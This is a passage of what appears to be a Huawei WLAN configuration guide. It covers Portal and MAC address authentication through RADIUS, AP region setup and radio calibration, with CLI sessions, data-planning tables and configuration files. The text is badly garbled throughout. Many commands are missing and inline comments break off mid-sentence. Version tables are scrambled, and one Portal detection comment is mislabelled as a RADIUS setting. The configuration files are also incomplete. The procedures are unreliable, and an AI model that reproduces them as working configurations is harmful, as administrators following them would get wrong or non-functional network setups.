[S9700] ip pool manage_area1_sta
[S9700-ip-pool-manage_area1_sta] gateway-list 10.23.101.1
[S9700-ip-pool-manage_area1_sta] network 10.23.101.0 mask 255.255.255.0
[S9700-ip-pool-manage_area1_sta] quit


# Configure a default route to the S9700 on the AC.

[AC] ip route-static 0.0.0.0 0.0.0.0 10.23.100.10
[AC] radius-server template radius1 //Create the RADIUS server template radius1.
address 10.23.100.1 weight 80 //Configure the active RADIUS authentication
server 1 and authentication port 1812. The AC uses the IP address 10.23.100.1 to
communicate with the active RADIUS authentication server 1.
address 10.23.100.1 weight 20 //Configure the standby RADIUS authentication
server, with the weight value lower than the active authentication server. Set
the authentication port number to 1812. The AC uses the IP address 10.23.100.1 to
communicate with the standby RADIUS authentication server.
10.23.100.1 weight 80 //Configure the active RADIUS accounting server 1 to
collect user login and logout information and set the accounting port number to
1813. The AC uses the IP address 10.23.100.1 to communicate with the active
RADIUS accounting server 1.
10.23.100.1 weight 20 //Configure the standby RADIUS accounting server, with
the weight value lower than the active accounting server. Set the accounting port
number to 1813. The AC uses the IP address 10.23.100.1 to communicate with the
standby RADIUS accounting server.
[AC-radius-radius1] radius-server detect-server interval 30 //Set the RADIUS
automatic detection interval to 30s. The default value is 60s.
[AC] aaa
radius1.
[AC-aaa-authen-radius1] authentication-mode radius //If the Controller
[AC-aaa-accounting-radius1] accounting realtime 15 //Enable real-time
accounting and set the accounting interval to 15 minutes. By default, real-time
accounting is disabled.
scheme radius1.
radius1.
radius1.

[AC-aaa] quit
# Configure a Portal server template for each of the three Controllers.

[AC] web-auth-server portal1 //Create the Portal server template portal1 for
Controller1.
the Portal server.
URL to the Portal server.
[AC-web-auth-server-portal1] server-detect interval 30 action log //Set the
RADIUS automatic detection interval to 30s. The default value is 60s.
Controller2.
[AC-web-auth-server-portal2] server-ip 10.23.30.2
[AC-web-auth-server-portal2] port 50100
[AC-web-auth-server-portal2] shared-key cipher Admin@123
[AC-web-auth-server-portal2] url http://10.23.30.2:8080/portal
[AC-web-auth-server-portal2] server-detect interval 30 action log
Controller3.
# Bind the Portal server templates to service VLANIF interfaces to enable Portal
authentication.
[AC-Vlanif101] domain name portal1 force //Configure the forcible user domain
portal1.
[AC-Vlanif101] domain name portal1 //Configure the default user domain portal1.
[AC-Vlanif101] authentication portal //Configure Portal authentication.
[AC-Vlanif101] web-auth-server portal1 portal3 layer3 //Bind the Portal server
templates portal1 and portal3.
[AC-Vlanif101] quit
[AC-Vlanif102] domain name portal1 force
[AC-Vlanif102] domain name portal1
[AC-Vlanif102] authentication portal
[AC-Vlanif102] web-auth-server portal2 portal3 layer3
[AC-Vlanif102] quit

[AC] wlan ac-global country-code cn //Configure the AC country code. Radio
features of APs managed by the AC must conform to local laws and regulations. The
default country code is CN.
radio using the country code and reset the AP. If th
e new country code does not support the radio, all configurations of the radio
are cleared. Continue?[Y/N]:y

AC ID to 1.


[AC] wlan
Step 5 Manage the APs on the AC.
------------------------------------------------------------------------------
ID Type
------------------------------------------------------------------------------
17 AP6010SN-GN
19 AP6010DN-AGN
21 AP6310SN-GN
23 AP6510DN-AGN
25 AP6610DN-AGN
27 AP7110SN-GN
28 AP7110DN-AGN
29 AP5010SN-GN
30 AP5010DN-AGN
31 AP3010DN-AGN
33 AP6510DN-AGN-US
34 AP6610DN-AGN-US
35 AP5030DN
36 AP5130DN
37 AP7030DE
38 AP2010DN
39 AP8130DN
40 AP8030DN
42 AP9330DN
43 AP4030DN
44 AP4130DN
45 AP3030DN
46 AP2030DN
------------------------------------------------------------------------------
Total number: 23
APs offline according to the obtained AP type IDs.
[AC-wlan-view] ap id 101 type-id 19 mac 60de-4476-e320 //Add the AP6010DN-AGN
# Configure AP regions and add the APs to the AP regions.

[AC-wlan-view] ap-region id 1 //Create AP region1 and add APs in area1 to AP
region 1.
[AC-wlan-ap-region-1] ap-region-name area1 //Name the AP region1 area1.
[AC-wlan-ap-101] region-id 1 //Add AP 101 to AP region1.
[AC-wlan-view] ap-region id 2 //Create AP region2 and add APs in area2 to AP

region 2.
[AC-wlan-ap-region-2] ap-region-name area2
# Power on the APs and run the display ap all command to check the AP running status. If
the AP State field displays as normal, the APs are online on the AC.
------------------------------------------------------------------------------
/Region
------------------------------------------------------------------------------
------------------------------------------------------------------------------

# Create the WMM profile wmm.
# Create the radio profile radio and bind the WMM profile wmm to the radio profile.
[AC-wlan-radio-prof-radio] power-mode fixed //Set the power mode of the radio to
fixed.
[AC-wlan-radio-prof-radio] channel-mode fixed //Set the channel mode of the
radio to fixed.
[AC-wlan-view] quit
# Create WLAN-ESS interface 1 and WLAN-ESS interface 2.

[AC-Wlan-Ess1] port trunk allow-pass vlan 101 102 //Configure the wlan-ess
interface to allow packets from wireless service VLANs to pass through, which is
one of the prerequisites for intra-AC roaming.
[AC-Wlan-Ess1] quit
[AC-Wlan-Ess2] quit
# Create the security profile security.

[AC] wlan
[AC-wlan-view] security-profile name security id 1 //Portal authentication has
# Create the traffic profile traffic.


# Create service sets area1 and area2, and bind the service VLANs, WLAN-ESS interfaces,
security profile, and traffic profile to the service sets. Set the forwarding mode to direct
forwarding.
[AC-wlan-view] service-set name area1 id 1 //Create the service set area1.
[AC-wlan-service-set-area1] ssid city-wlan //Set the SSID to city-wlan.
[AC-wlan-service-set-area1] wlan-ess 1 //Bind the WLAN-ESS interface.
[AC-wlan-service-set-area1] security-profile name security //Bind the security
profile security.
[AC-wlan-service-set-area1] traffic-profile name traffic //Bind the traffic
profile traffic.
[AC-wlan-service-set-area1] service-vlan 101 //Bind the service VLAN 101.
[AC-wlan-service-set-area1] forward-mode direct-forward //Set the forwarding
mode to direct forwarding (default setting).
[AC-wlan-service-set-area1] user-isolate //Configure Layer 2 isolation for users
connected to the same VAP.
[AC-wlan-service-set-area1] quit
[AC-wlan-view] service-set name area2 id 2
[AC-wlan-service-set-area2] ssid city-wlan //Set the SSID to city-wlan. All
service sets must be configured with the same SSID, which is one of the
prerequisites for intra-AC roaming.
[AC-wlan-service-set-area2] wlan-ess 2
[AC-wlan-service-set-area2] security-profile name security //Bind the security
profile security. All service sets must have the same security profile bound,
which is one of the prerequisites for intra-AC roaming.
[AC-wlan-service-set-area2] traffic-profile name traffic
[AC-wlan-service-set-area2] service-vlan 102
[AC-wlan-service-set-area2] forward-mode direct-forward
[AC-wlan-service-set-area2] user-isolate
[AC-wlan-service-set-area2] quit

# Configure VAPs.
[AC-wlan-view] ap 101 radio 0 //Configure radio0 of the AP6010DN-AGN.
[AC-wlan-radio-101/0] radio-profile name radio //Bind the radio profile to the
radio.
[AC-wlan-radio-101/0] service-set name area1 //Bind the service set to the
radio. A VAP is generated after the binding.
[AC-wlan-radio-101/0] power-level 10 //Configure the power based on the planning
result of the WLAN Planner.
[AC-wlan-view] ap 101 radio 1 //Configure radio1 of the AP6010DN-AGN.
[AC-wlan-radio-101/1] service-set name area1



:y

----------------------------------------------------------------------
----------------------------------------------------------------------
101 0 1 - - 1 60de-4476-e320 service
101 1 1 - - 1 60de-4476-e330 service
102 0 1 - - 1 60de-4476-e340 service
102 1 1 - - 1 60de-4476-e350 service
201 0 2 - - 1 60de-4476-e360 service
201 1 2 - - 1 60de-4476-e370 service
202 0 2 - - 1 60de-4476-e380 service
202 1 2 - - 1 60de-4476-e390 service
----------------------------------------------------------------------
Total: 8
# STAs discover the WLAN with the SSID city-wlan and associate with the WLAN. The
network. Run the display station assoc-info command on the AC. The command output
shows that the STAs have connected to the WLAN city-wlan.
[AC-wlan-view] display station assoc-info all
AP/Rf/WLAN: AP ID/Radio ID/WLAN ID
------------------------------------------------------------------------------
STA MAC AP/Rf/WLAN Rx/Tx Mode RSSI IP address
SSID
------------------------------------------------------------------------------
e019-1dc7-1e08 101/0/1 6/11 11n -89 10.23.101.254
city-wlan
------------------------------------------------------------------------------
Total stations: 1
# STAs obtain IP addresses and connect to the network.
----End

Configuration Files
#
sysname S5700-1
#
vlan batch 10 101
#
#
#
#
return

#
sysname S5700-2
#
vlan batch 20 102
#
#
#
#
return
l Configuration file of the S9700

#
sysname S9700
#
vlan batch 10 20 100 to 102 300
#
dhcp enable
#
ip pool manage_ap1
network 10.23.10.0 mask 255.255.255.0
option 43 sub-option 3 ip-address 10.23.100.1
#
ip pool manage_ap2
network 10.23.20.0 mask 255.255.255.0
#
ip pool manage_area1_sta

network 10.23.101.0 mask 255.255.255.0
#
network 10.23.102.0 mask 255.255.255.0
#
interface Vlanif10
description manage_ap1
ip address 10.23.10.1 255.255.255.0
dhcp select global
#
interface Vlanif20
ip address 10.23.20.1 255.255.255.0
dhcp select global
#
interface Vlanif100
ip address 10.23.100.10 255.255.255.0
#
interface Vlanif101
description manage_area1_sta
ip address 10.23.101.1 255.255.255.0
dhcp select global
#
interface Vlanif102
ip address 10.23.102.1 255.255.255.0
dhcp select global
#
interface Vlanif300
ip address 10.23.30.10 255.255.255.0
#
#
#
#
#
#
eth-trunk 1
#
eth-trunk 1
#
return
#
sysname AC
#
#
#

radius-server shared-key cipher %#%#8M.(7SIkd!~zHjCXjHv%}13$Y#:t3:m]N

$G^9yn3%#%#
weight 80
weight 80
weight 20
weight 80
weight 80
weight 20
radius-server detect-server interval 30
#
port 50100
shared-key cipher %#%#a^9$8KWl#+C4xc2}#BEQ4!ZIOciEV7$%dT'S/3JX%#%#
url http://10.23.30.1:8080/portal
server-detect interval 30 action log
#
port 50100
shared-key cipher %#%#3'uk~,dhv>_!~;W!v6A3YiqL2UU|*4Q>{UH%Tw'A%#%#
url http://10.23.30.2:8080/portal
#
port 50100
shared-key cipher %#%#un.DDNfj[X\.u3&zIya<P,3wBg'cEQFedz,DoIO"%#%#
url http://10.23.30.3:8080/portal
#
interface Vlanif100
ip address 10.23.100.1 255.255.255.0
#
interface Vlanif101
web-auth-server portal1 portal3 layer3
domain name portal1
#
interface Vlanif102
domain name portal1
#
#
eth-trunk 1
#
eth-trunk 1
#
interface Wlan-Ess1
#
interface Wlan-Ess2
#
ip route-static 0.0.0.0 0.0.0.0 10.23.100.10

#
#
wlan
ap-region id 1
ap-region-name area1
ap-region id 2
ap-region-name area2
region-id 1
region-id 1
region-id 2
region-id 2
service-set name area1 id 1
wlan-ess 1
ssid city-wlan
user-isolate
service-vlan 101
service-set name area2 id 2
wlan-ess 2
ssid city-wlan
user-isolate
service-vlan 102
channel-mode fixed
power-mode fixed
wmm-profile id 1
ap 101 radio 0
radio-profile id 1
power-level 10
ap 101 radio 1
radio-profile id 1
channel 20MHz 153
power-level 10
ap 102 radio 0
radio-profile id 1
channel 20MHz 6
power-level 10
ap 102 radio 1
radio-profile id 1
channel 20MHz 161
power-level 10
ap 201 radio 0
radio-profile id 1
power-level 10
ap 201 radio 1
radio-profile id 1
channel 20MHz 153
power-level 10
ap 202 radio 0
radio-profile id 1
channel 20MHz 6
power-level 10

ap 202 radio 1
radio-profile id 1
channel 20MHz 161
power-level 10
#
return
15.6 Example for Configuring MAC Address

Authentication on the Wireless Side
MAC Address Authentication on the Wireless Side Overview
Portal authentication is also called web authentication. Generally, Portal authentication
websites are also called Portal websites. When users go online, they must be authenticated on
Portal websites. The users can use network resources only after they pass the authentication.
A user can access a known Portal authentication website and enter a user name and password
for authentication. This mode is called active authentication. If a user attempts to access other
external networks through HTTP, the device forcibly redirects the user to the Portal
authentication website for Portal authentication. This mode is called forcible authentication.
Configuration Notes


are
Versi
on
V200 S12700 V200R005C00:

AGN, AP7110SN-GN
V200 S12700 V200R005C00:

AGN, AP7110SN-GN
V200 S12700 V200R005C10:

V200R005C20:
AP7030DE, AP9330DN
V200 S12700 V200R005C10:

V200R005C20:
AP7030DE, AP9330DN
V200R005C30:
As shown in Figure 15-5, the enterprise's AC connects to the egress gateway (Router) and
RADIUS server, and connects to the AP through SwitchA. The WLAN with the SSID of test
is available for wireless users and terminals to access network resources. The gateway also
functions as a DHCP server to provide IP addresses on the 10.10.10.0/24 network segment for
STAs. The AC controls and manages STAs.
The WLAN authentication client cannot be installed on wireless devices providing public
services, such as wireless printers and phones, so use MAC address authentication. The

RADIUS server authenticates wireless devices using their MAC addresses. No authentication
is required when STAs access the WLAN, facilitating the use of WLAN services.
Figure 15-5 Networking diagram for configuring MAC address authentication on the wireless
side
In te rn e t
R o u te r
G a te w a y
G E 2 /0 /0 R A D IU S S e rve r
G E 1 /0 /2 1 0 .1 2 .1 0 .1 :1 8 1 2
G E 1 /0 /3
AC
G E 1 /0 /1
G E 0 /0 /2
S w itch A
G E 0 /0 /1
AP
STA STA
Data Planning

Configuration Item Data
WLAN service Open system authentication+non-encryption
Management VLAN VLAN 100
Service VLAN VLAN 101
Source interface on the AC VLANIF 100: 192.168.10.1/24
AC carrier ID/AC ID Other/1
AP region ID 10
Service set l SSID: test

l Data forwarding mode: tunnel forwarding
SwitchA VLAN VLAN 100

DHCP server l IP addresses that the AC assigns to APs:

192.168.10.2 to 192.168.10.254/24
l IP addresses that Router assigns to STAs:
10.10.10.2 to 10.10.10.254/24
Gateway for the AP VLANIF 100: 192.168.10.1/24
Gateway for STAs VLANIF 101: 10.10.10.1/24
RADIUS authentication l IP address: 10.12.10.1

parameters l Port number: 1812
l Shared key: 123456
l AAA domain: huawei.com
MAC address of a STA 0011-2233-4455
1. Configure WLAN basic services so that STAs can access the WLAN. This example uses
default configurations.
2. Configure a RADIUS server template and apply it to an AAA domain
3. Configure MAC address authentication on the WLAN-ESS interface to authenticate
STAs.
Procedure

[HUAWEI] sysname AC


# Configure VLANIF 101 (service VLAN), VLANIF 102, and VLANIF 103.
[AC-Vlanif101] quit
[AC-Vlanif102] quit
[AC-Vlanif103] quit

# Add GE1/0/2 that connects the AC to the RADIUS server to VLAN 103.
# On the AC, configure a static route.

STAs.
[AC] dhcp enable
[AC-Vlanif100] quit
[AC-Vlanif101] quit



1. Configure a RADIUS server template, an AAA authentication scheme, and domain
information.
NOTE
The STA sends its MAC address as the user name to the RADIUS server for authentication, so the
AC needs to be disabled from adding a domain name to the user name (default setting).
[AC] radius-server template radius_huawei
[AC-radius-radius_huawei] radius-server authentication 10.12.10.1 1812
[AC-radius-radius_huawei] radius-server shared-key cipher 123456 //The
default key is huawei.
[AC-radius-radius_huawei] quit
[AC] aaa
[AC-aaa] authentication-scheme radius_huawei
[AC-aaa-authen-radius_huawei] authentication-mode radius
[AC-aaa-authen-radius_huawei] quit
[AC-aaa] domain huawei.com
[AC-aaa-domain-huawei.com] authentication-scheme radius_huawei
[AC-aaa-domain-huawei.com] radius-server radius_huawei
[AC-aaa-domain-huawei.com] quit
[AC-aaa] quit
2. Globally configure user names in MAC address authentication without the delimiter "-"
(default setting).
3. Test whether a STA can be authenticated using RADIUS authentication. In MAC address
authentication, STA's MAC address is used as the user name and password.
[AC] test-aaa 001122334455 001122334455 radius-template radius_huawei


AC ID to 1.

[AC] wlan

------------------------------------------------------------------------------
ID Type
------------------------------------------------------------------------------
17 AP6010SN-GN
19 AP6010DN-AGN
21 AP6310SN-GN
23 AP6510DN-AGN
25 AP6610DN-AGN
27 AP7110SN-GN

28 AP7110DN-AGN
29 AP5010SN-GN
30 AP5010DN-AGN
31 AP3010DN-AGN
33 AP6510DN-AGN-US
34 AP6610DN-AGN-US
35 AP5030DN
36 AP5130DN
37 AP7030DE
38 AP2010DN
39 AP8130DN
40 AP8030DN
42 AP9330DN
43 AP4030DN
44 AP4130DN
45 AP3030DN
46 AP2030DN
------------------------------------------------------------------------------
Total number: 23
[AC-wlan-ap-0] quit

[AC-wlan-ap-0] quit
All AP information:
------------------------------------------------------------------------------
/Region
------------------------------------------------------------------------------
------------------------------------------------------------------------------

[AC-wlan-view] quit

[AC-Wlan-Ess1] quit


[AC] wlan

[AC-wlan-service-set-test] ssid test //Set the SSID name to test.
[AC-wlan-service-set-test] service-vlan 101 //Set the VLAN ID of the service
set to 101. The default value is 1.
[AC-wlan-service-set-test] forward-mode tunnel //Set the forwarding mode to
tunnel forwarding.
Step 8 Configure MAC address authentication on the WLAN-ESS interface.

[AC-wlan-view] quit
[AC-Wlan-Ess1] authentication mac-authen
[AC-Wlan-Ess1] domain name huawei.com force
[AC-Wlan-Ess1] permit-domain name huawei.com
[AC-Wlan-Ess1] quit
[AC] wlan

# Configure a VAP.
radio.

:y

l The WLAN with SSID test is available for STAs connected to the AP.
l After the WLAN function is enabled on wireless devices, they can access the WLAN
and provide public services.
l After the STA connects to the WLAN, authentication is performed automatically. You
can directly access the WLAN.
----End
Configuration Files
#
sysname SwitchA

#
vlan batch 100
#
#
#
return
#
sysname Router
#
vlan batch 102
#
dhcp enable
#
ip pool sta
network 10.10.10.0 mask 255.255.255.0
#
interface Vlanif102
ip address 10.11.10.1 255.255.255.0
dhcp select global
#
#
ip route-static 10.10.10.0 255.255.255.0 10.11.10.2
#
return
#
sysname AC
#
#
#
dhcp enable
#
radius-server template radius_huawei
radius-server shared-key cipher %#%#Dh.LR>nZA,K_(/~3#i!@a;6}Vk\T_9òcp<^c"q%
%#%
#
aaa
authentication-scheme radius_huawei
domain huawei.com
radius-server radius_huawei
#
interface Vlanif100
ip address 192.168.10.1 255.255.255.0
#
interface Vlanif101
ip address 10.10.10.1 255.255.255.0
dhcp select relay
#

interface Vlanif102
ip address 10.11.10.2 255.255.255.0
#
interface Vlanif103
ip address 10.12.10.2 255.255.255.0
#
#
#
#
interface WLAN-ESS1
permit-domain name huawei.com
domain name huawei.com force
#
wlan
ap-region id 10
region-id 10
forward-mode tunnel
wlan-ess 1
ssid test
service-vlan 101
wmm-profile id 1
ap 0 radio 0
radio-profile id 1
#
return
15.7 Example for Configuring Portal Authentication on the

Wireless Side
Portal Authentication on the Wireless Side Overview
MAC address authentication controls a user's network access rights based on the user's
interface and MAC address. The user does not need to install any client software. The device
starts authenticating a user when detecting the user's MAC address for the first time on the
interface where MAC address authentication has been enabled. During the authentication
process, the user does not need to enter a user name or password.

Configuration Notes

are
Versi
on
V200 S12700 V200R005C00:

AGN, AP7110SN-GN
V200 S12700 V200R005C00:

AGN, AP7110SN-GN


are
Versi
on
V200 S12700 V200R005C10:

V200R005C20:
AP7030DE, AP9330DN
V200 S12700 V200R005C10:

V200R005C20:
AP7030DE, AP9330DN
V200R005C30:
As shown in Figure 15-6, the AC deployed in an open place connects to the egress gateway
(Router), RADIUS server, and Portal server, and connects to the AP through SwitchA. The
WLAN with the SSID of test is available for users to access network resources. The gateway
also functions as a DHCP server to provide IP addresses on the 10.10.10.0/24 network
segment for STAs. The AC controls and manages STAs.
Because the WLAN is open to users, there are potential security risks. To facilitate access to
the WLAN, use the default security policy on the AC. STAs are not authenticated and data is
not encrypted. To uniformly manage STAs and allow only paid users to access the Internet,
configure Portal authentication on the AC. Any user who attempts to access the Internet is
redirected to the Portal authentication web page. A paid user connects to the Internet after
entering the user name and password, and the RADIUS server starts accounting. An unpaid
user must pay for the WLAN service and use the obtained user name and password to
complete Portal authentication. Generally, the Portal authentication web page provides the
paying function.

Figure 15-6 Networking diagram for configuring Portal authentication on the wireless side
P o rta l S e rve r
In te rn e t
R o u te r 1 0 .1 3 .1 0 .1
网关
G E 2 /0 /0
G E 1 /0 /2 R A D IU S S e rve r
G E 1 /0 /4
G E 1 /0 /3
AC
G E 1 /0 /1 1 0 .1 2 .1 0 .1
G E 0 /0 /2 A u th e n tica tio n p o rt: 1 8 1 2
A cco u n tin g p o rt: 1 8 1 3
S w itch A
G E 0 /0 /1
AP
STA STA
Data planning

WLAN service Open system authentication+non-encryption
Management VLAN VLAN 100
Service VLAN VLAN 101
Source interface on the AC VLANIF 100: 192.168.10.1/24
AC carrier ID/AC ID Other/1
AP region ID 10
Service set l SSID: test

l Data forwarding mode: tunnel forwarding
SwitchA VLAN VLAN 100

DHCP server l IP addresses that the AC assigns to APs:

192.168.10.2 to 192.168.10.254/24
l IP addresses that Router assigns to STAs:
10.10.10.2 to 10.10.10.254/24
Gateway for the AP VLANIF 100: 192.168.10.1/24
Gateway for STAs VLANIF 101: 10.10.10.1/24
RADIUS server parameters l Server IP address: 10.12.10.1

l Authentication port number: 1812
l Accounting port number: 1813
l Shared key: 123456
l AAA domain: huawei.com
User name and password of STAs l User name: test@huawei.com

l Password: 123456
Portal server parameters l Server IP address: 10.13.10.1

l Shared key: huawei
1. Configure WLAN basic services so that STAs can access the WLAN. This example uses
default configurations.
2. Configure a RADIUS server template, apply it to an AAA domain, and use a RADIUS
server to authenticate STAs' identities and perform accounting.
3. Configure Portal authentication. Hypertext Transfer Protocol (HTTP) request packets
from a user are redirected to the web page of the Portal server. After the user enters
identity information, the STA sends the user identity information to the RADIUS server.
Procedure



[HUAWEI] sysname AC

# Configure VLANIF 101 (service VLAN), VLANIF 102, VLANIF 103, and VLANIF 104.
[AC] vlan batch 101 102 103 104
[AC-Vlanif101] quit
[AC-Vlanif102] quit
[AC-Vlanif103] quit
[AC-Vlanif104] quit

# Add GE1/0/3 that connects the AC to the RADIUS server to VLAN 103.
# Add GE1/0/4 that connects the AC to the Portal server to VLAN 104.
# On the AC, configure a static route.

STAs.
[AC] dhcp enable
[AC-Vlanif100] quit

[AC-Vlanif101] quit

Step 4 Configure RADIUS authentication and accounting.

# Configure a RADIUS server template, an AAA authentication scheme, an AAA accounting
scheme, and domain information.
[AC-radius-radius_huawei] radius-server accounting 10.12.10.1 1813
[AC-radius-radius_huawei] radius-server shared-key cipher 123456 //The default
key is huawei.
[AC] aaa
[AC-aaa] accounting-scheme radius_huawei
[AC-aaa-accounting-radius_huawei] accounting-mode radius
[AC-aaa-accounting-radius_huawei] quit
[AC-aaa-domain-huawei.com] accounting-scheme radius_huawei
[AC-aaa] quit
# Test whether a STA can be authenticated using RADIUS authentication.

[AC] test-aaa test@huawei.com 123456 radius-template radius_huawei

# Configuring Portal server parameters. Set the port number to 50100 (default setting).
[AC] web-auth-server test
[AC-web-auth-server-test] server-ip 10.13.10.1
[AC-web-auth-server-test] port 50100
[AC-web-auth-server-test] shared-key cipher huawei
[AC-web-auth-server-test] url http://10.13.10.1
[AC-web-auth-server-test] quit




AC ID to 1.

[AC] wlan

------------------------------------------------------------------------------
ID Type
------------------------------------------------------------------------------
17 AP6010SN-GN
19 AP6010DN-AGN
21 AP6310SN-GN
23 AP6510DN-AGN
25 AP6610DN-AGN
27 AP7110SN-GN
28 AP7110DN-AGN
29 AP5010SN-GN
30 AP5010DN-AGN
31 AP3010DN-AGN
33 AP6510DN-AGN-US
34 AP6610DN-AGN-US
35 AP5030DN
36 AP5130DN
37 AP7030DE
38 AP2010DN
39 AP8130DN
40 AP8030DN
42 AP9330DN
43 AP4030DN
44 AP4130DN
45 AP3030DN
46 AP2030DN
------------------------------------------------------------------------------
Total number: 23
[AC-wlan-ap-0] quit

[AC-wlan-ap-0] quit
All AP information:

------------------------------------------------------------------------------
/Region
------------------------------------------------------------------------------
------------------------------------------------------------------------------

[AC-wlan-view] quit

[AC-Wlan-Ess1] quit

[AC] wlan

[AC-wlan-service-set-test] ssid test //Set the SSID name to test.
[AC-wlan-service-set-test] service-vlan 101 //Set the VLAN ID of the service
set to 101. The default value is 1.
[AC-wlan-service-set-test] forward-mode tunnel //Set the forwarding mode to
tunnel forwarding.
Step 9 Configure Portal authentication on the WLAN-ESS interface.

[AC-wlan-view] quit
[AC-Wlan-Ess1] authentication portal
[AC-Wlan-Ess1] web-auth-server test direct
[AC-Wlan-Ess1] quit
[AC] wlan

# Configure a VAP.

radio.

:y

l The WLAN with SSID test is available for STAs connected to the AP.
l The wireless PC obtains an IP address after it associates with the WLAN.
l Open a browser on the STA to access the web page. The Portal authentication web page
is automatically displayed. Enter the user name and password. The STA is authenticated
and can access the WLAN.
----End
Configuration Files
#
sysname SwitchA
#
vlan batch 100
#
#
#
return

#
sysname Router
#
vlan batch 102
#
dhcp enable
#
ip pool sta
network 10.10.10.0 mask 255.255.255.0
#
interface Vlanif102
ip address 10.11.10.1 255.255.255.0
dhcp select global
#
#
ip route-static 10.10.10.0 255.255.255.0 10.11.10.2
#
return

#
sysname AC
#
#
#
dhcp enable
#
radius-server shared-key cipher %#%#Dh.LR>nZA,K_(/~3#i!@a;6}Vk\T_9òcp<^c"q%
%#%
#
web-auth-server test
port 50100
shared-key cipher %#%#Q"r\<Ei]o@"%dKN@Y(i,:nj2IY$e>=mXxg8Cdb]0%#%#
url http://10.13.10.1
#
aaa
accounting-scheme radius_huawei
domain huawei.com
accounting-scheme radius_huawei
#
interface Vlanif100
ip address 192.168.10.1 255.255.255.0
#
interface Vlanif101
ip address 10.10.10.1 255.255.255.0
dhcp select relay
#
interface Vlanif102
ip address 10.11.10.2 255.255.255.0
#
interface Vlanif103
ip address 10.12.10.2 255.255.255.0
#
interface Vlanif104
ip address 10.13.10.2 255.255.255.0
#
#
#
#
#
interface Wlan-Ess1

web-auth-server test direct

#
wlan
ap-region id 10
ap id 0 type-id 19 mac 60de-4476-e360 sn AB35015384
region-id 10
forward-mode tunnel
wlan-ess 1
ssid test
service-vlan 101
wmm-profile id 1
ap 0 radio 0
radio-profile id 1
#
return

15.8.1 Example for Configuring Radio Calibration
Radio Calibration Overview

Radio calibration can dynamically adjust channels and power of APs managed by the same
AC to ensure that the APs work at the optimal performance. On a WLAN, operating status of
APs is affected by the radio environment. For example, if adjacent APs managed by the same
AC work on overlapping channels or an AP has large power, signal interference occurs. In
this case, you can configure radio calibration on the AC.
Typical application scenarios of radio calibration are as follows:
l During AP deployment, configure radio calibration to enable APs to automatically select
the optimal channels.
l When new APs are added to a network or the network environment changes, configure
radio calibration so that APs can adjust channels and power at scheduled time to work at
optimal performance.
Configuration Notes


l When configuring radio calibration, set the channel mode and power mode of an AP that
needs radio calibration to auto.
l In the following example, scheduled radio calibration is used as an example. Configure
the APs to perform radio calibration in off-peak hours, for example, between 00:00 am
and 06:00 am.
Configuration.


are
Versi
on
V200 S12700 V200R005C00:

AGN, AP7110SN-GN
V200 S12700 V200R005C00:

AGN, AP7110SN-GN
V200 S12700 V200R005C10:

V200R005C20:
AP7030DE, AP9330DN
V200 S12700 V200R005C10:

V200R005C20:
AP7030DE, AP9330DN
V200R005C30:
As shown in Figure 15-7, a WLAN containing three APs (AP1, AP2, and AP3) is deployed
on the campus network. The three APs join AP region 10.
Users expect that three APs can automatically adjust their channels and power to reduce
interference and achieve optimal WLAN performance.

Figure 15-7 Networking for configuring radio calibration
STA
AP1
GE0/0/1
VLAN 100
GE0/0/2 GE0/0/4
STA
VLAN 100 VLAN 100
Internet
AP2 SwitchA AC
GE1/0/1 GE1/0/4
STA GE0/0/3
VLAN 100 VLAN 100 VLAN 101
AP3
STA
Management VLAN: VLAN 100

Service VLAN: VLAN 101
AP region ID: 10
Data Planning
Table 15-18 Data required for completing the configuration


source interface

l Security and
WPA2+PSK
huawei123


l SSID: test
WLAN-ESS 1
tunnel forwarding


range 192.168.10.1/24
192.168.10.2 to
192.168.10.254/24

range 192.168.11.1/24
192.168.11.2 to
192.168.11.254/24
MAC addresses of APs l AP1: 60de-4476-e360 None

l AP2: dcd2-fc04-b500
l AP3: dcd2-fc96-e4c0
1. Configure basic WLAN services to ensure that users can access the Internet through
WLAN.
2. Configure schedule mode radio calibration for APs to enable the APs to dynamically
adjust channels and power so that the APs work at optimal performance.
Procedure
AC so that the APs and AC can transmit CAPWAP packets.
# Configure SwitchA and add interfaces GE0/0/1, GE0/0/2, GE0/0/3, and GE0/0/4 to VLAN
100 (management VLAN).


[SwitchA-gigabitethernet0/0/4] port link-type trunk
[SwitchA-gigabitethernet0/0/4] port trunk allow-pass vlan 100
[SwitchA-gigabitethernet0/0/4] quit

[HUAWEI] sysname AC
[AC] vlan batch 100
Step 2 Connect the AC to upstream devices.

# Add AC's uplink interface GE1/0/4 to VLAN 101.
[AC] vlan batch 101
Step 3 Configure the AC as a DHCP server to allocate IP addresses to STAs and APs.
# Configure the AC as the DHCP server to allocate IP addresses to the APs from the IP
VLANIF 101.
[AC-Vlanif100] quit
[AC-Vlanif101] quit


AC ID to 1.

[AC] wlan
Step 5 Manage APs on the AC.

# Check the MAC address of the AP and view the AP type ID.


------------------------------------------------------------------------------
ID Type
------------------------------------------------------------------------------
17 AP6010SN-GN
19 AP6010DN-AGN
21 AP6310SN-GN
23 AP6510DN-AGN
25 AP6610DN-AGN
27 AP7110SN-GN
28 AP7110DN-AGN
29 AP5010SN-GN
30 AP5010DN-AGN
31 AP3010DN-AGN
33 AP6510DN-AGN-US
34 AP6610DN-AGN-US
35 AP5030DN
36 AP5130DN
37 AP7030DE
38 AP2010DN
39 AP8130DN
40 AP8030DN
42 AP9330DN
43 AP4030DN
44 AP4130DN
45 AP3030DN
46 AP2030DN
------------------------------------------------------------------------------
Total number: 23
AP offline according to the AP type ID. Assume that the AP type is AP6010DN-AGN and the
MAC addresses of the APs are 60de-4476-e360, dcd2-fc04-b500, and dcd2-fc96-e4c0
respectively.
[AC-wlan-ap-1] quit
[AC-wlan-view] ap id 2 type-id 19 mac dcd2-fc04-b500
[AC-wlan-ap-2] quit
[AC-wlan-view] ap id 3 type-id 19 mac dcd2-fc96-e4c0
[AC-wlan-ap-3] quit
# Configure an AP region and add the APs to the AP region.

[AC-wlan-ap-1] region-id 10 //Add APs to region 10.
[AC-wlan-ap-1] quit
[AC-wlan-ap-2] quit
[AC-wlan-ap-3] quit
# After powering on the three APs, run the display ap all command on the AC to check the
AP running status. The command output shows that the AP status is normal.
All AP information:
------------------------------------------------------------------------------
/Region
------------------------------------------------------------------------------


2 AP6010DN-AGN dcd2-fc04-b500 0/10 normal ap-2
3 AP6010DN-AGN dcd2-fc96-e4c0 0/10 normal ap-3
------------------------------------------------------------------------------

# Create a WMM profile named wmm and retain the default settings in the profile.
Set the channel mode and power mode to auto in the radio profile (default settings).
[AC-wlan-view] quit

[AC-Wlan-Ess1] quit

[AC] wlan
